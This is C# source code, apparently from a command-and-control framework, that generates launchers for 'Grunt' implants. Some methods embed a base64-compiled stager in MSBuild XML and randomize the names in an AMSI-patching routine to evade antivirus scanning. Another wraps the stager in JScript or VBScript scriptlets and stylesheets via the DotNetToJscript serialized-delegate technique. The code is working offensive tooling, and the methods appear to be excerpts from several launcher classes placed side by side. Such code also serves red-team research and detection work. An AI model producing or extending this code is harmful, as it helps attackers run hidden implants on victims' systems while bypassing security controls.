public override string GetLauncher(string StagerCode, byte[] StagerAssembly, Grunt grunt, ImplantTemplate template)
{
this.StagerCode = StagerCode;
this.Base64ILByteString = Convert.ToBase64String(StagerAssembly);
this.DiskCode = XMLTemplate.Replace("{{GRUNT_IL_BYTE_STRING}}", this.Base64ILByteString);
this.DiskCode = DiskCode.Replace("{{TARGET_NAME}}", this.TargetName);
this.DiskCode = DiskCode.Replace("{{TASK_NAME}}", this.TaskName);
// Replacements for obfuscation
this.DiskCode = DiskCode.Replace("{{PATCH_AMSI}}", this.random_var_patchAmsi);
this.DiskCode = DiskCode.Replace("{{AMSI}}", this.random_var_amsi);
this.DiskCode = DiskCode.Replace("{{MEMORY_STREAM}}", this.random_var_outputMemoryStream);
this.DiskCode = DiskCode.Replace("{{DEFLATE_STREAM}}", this.random_var_deflateStream);
this.DiskCode = DiskCode.Replace("{{BYTE_ARRAY}}", this.random_var_byteArray);
this.DiskCode = DiskCode.Replace("{{READ}}", this.random_var_read);
this.DiskCode = DiskCode.Replace("{{LIB}}", this.random_var_lib);
this.DiskCode = DiskCode.Replace("{{AMSI_DLL_0}}", this.random_var_amsi_dll[0]);
this.DiskCode = DiskCode.Replace("{{AMSI_DLL_1}}", this.random_var_amsi_dll[1]);
this.DiskCode = DiskCode.Replace("{{AMSI_SCAN_BUFF_0}}", this.random_var_amsiScanBuffer[0]);
this.DiskCode = DiskCode.Replace("{{AMSI_SCAN_BUFF_1}}", this.random_var_amsiScanBuffer[1]);
this.DiskCode = DiskCode.Replace("{{AMSI_SCAN_BUFF_2}}", this.random_var_amsiScanBuffer[2]);
this.DiskCode = DiskCode.Replace("{{ASSEMBLY_BUFFER}}", this.random_var_assemblyBuffer);
string launcher = "msbuild.exe" + " " + template.Name + ".xml";
this.LauncherString = launcher;
return(this.LauncherString);
}
public override string GetLauncher(Listener listener, Grunt grunt, HttpProfile profile)
{
this.StagerCode = listener.GetGruntStagerCode(grunt, profile);
this.Base64ILByteString = listener.CompileGruntStagerCode(grunt, profile, this.OutputKind, true);
this.DiskCode = XMLTemplate.Replace("{{GRUNT_IL_BYTE_STRING}}", this.Base64ILByteString);
this.DiskCode = DiskCode.Replace("{{TARGET_NAME}}", this.TargetName);
this.DiskCode = DiskCode.Replace("{{TASK_NAME}}", this.TaskName);
string launcher = "msbuild.exe" + " " + "file.xml";
this.LauncherString = launcher;
return(this.LauncherString);
}
public override string GetLauncher(string StagerCode, byte[] StagerAssembly, Grunt grunt, ImplantTemplate template)
{
this.StagerCode = StagerCode;
this.Base64ILByteString = Convert.ToBase64String(StagerAssembly);
this.DiskCode = XMLTemplate.Replace("{{GRUNT_IL_BYTE_STRING}}", this.Base64ILByteString);
this.DiskCode = DiskCode.Replace("{{TARGET_NAME}}", this.TargetName);
this.DiskCode = DiskCode.Replace("{{TASK_NAME}}", this.TaskName);
string launcher = "msbuild.exe" + " " + "file.xml";
this.LauncherString = launcher;
return(this.LauncherString);
}
public override string GetLauncher(Listener listener, Grunt grunt, HttpProfile profile)
{
this.StagerCode = listener.GetGruntStagerCode(grunt, profile);
this.Base64ILByteString = listener.CompileGruntStagerCode(grunt, profile, this.OutputKind, false);
// Credit DotNetToJscript (tyranid - James Forshaw)
byte[] serializedDelegate = Convert.FromBase64String(FrontBinaryFormattedDelegate).Concat(Convert.FromBase64String(this.Base64ILByteString)).Concat(Convert.FromBase64String(EndBinaryFormattedDelegate)).ToArray();
int ofs = serializedDelegate.Length % 3;
if (ofs != 0)
{
int length = serializedDelegate.Length + (3 - ofs);
Array.Resize(ref serializedDelegate, length);
}
string base64Delegate = Convert.ToBase64String(serializedDelegate);
int lineLength = 80;
List <String> splitString = new List <String>();
for (int i = 0; i < base64Delegate.Length; i += lineLength)
{
splitString.Add(base64Delegate.Substring(i, Math.Min(lineLength, base64Delegate.Length - i)));
}
string language = "";
string code = "";
if (this.ScriptLanguage == ScriptingLanguage.JScript)
{
string DelegateBlock = String.Join("\"+\r\n\"", splitString.ToArray());
code = JScriptTemplate.Replace(Environment.NewLine, "\r\n").Replace("{{REPLACE_GRUNT_IL_BYTE_STRING}}", DelegateBlock);
language = "JScript";
}
else if (this.ScriptLanguage == ScriptingLanguage.VBScript)
{
string DelegateBlock = String.Join("\"\r\ns = s & \"", splitString.ToArray());
code = VBScriptTemplate.Replace(Environment.NewLine, "\r\n").Replace("{{REPLACE_GRUNT_IL_BYTE_STRING}}", DelegateBlock);
if (this.ScriptType == ScriptletType.Stylesheet)
{
code = "<![CDATA[\r\n" + code + "\r\n]]>";
}
language = "VBScript";
}
if (this.ScriptType == ScriptletType.Plain)
{
this.DiskCode = code;
}
else if (this.ScriptType == ScriptletType.Scriptlet || this.ScriptType == ScriptletType.TaggedScript)
{
string TaggedScript = TaggedScriptTemplate.Replace(Environment.NewLine, "\r\n").Replace("{{REPLACE_SCRIPT_LANGUAGE}}", language);
TaggedScript = TaggedScript.Replace("{{REPLACE_SCRIPT}}", code);
if (this.ScriptType == ScriptletType.TaggedScript)
{
this.DiskCode = TaggedScript;
}
else
{
this.DiskCode = ScriptletCodeTemplate.Replace(Environment.NewLine, "\r\n").Replace("{{REPLACE_TAGGED_SCRIPT}}", TaggedScript).Replace("{{REPLACE_PROGID}}", this.ProgId);
}
}
else if (this.ScriptType == ScriptletType.Stylesheet)
{
this.DiskCode = StylesheetCodeTemplate.Replace(Environment.NewLine, "\r\n").Replace("{{REPLACE_SCRIPT_LANGUAGE}}", language);
this.DiskCode = DiskCode.Replace("{{REPLACE_SCRIPT}}", code);
}
if (this.DotNetFrameworkVersion == Common.DotNetVersion.Net35)
{
this.DiskCode = this.DiskCode.Replace("{{REPLACE_VERSION_SETTER}}", "");
}
else if (this.DotNetFrameworkVersion == Common.DotNetVersion.Net40)
{
this.DiskCode = this.DiskCode.Replace("{{REPLACE_VERSION_SETTER}}", JScriptNet40VersionSetter);
}
return(GetLauncher(this.DiskCode));
}
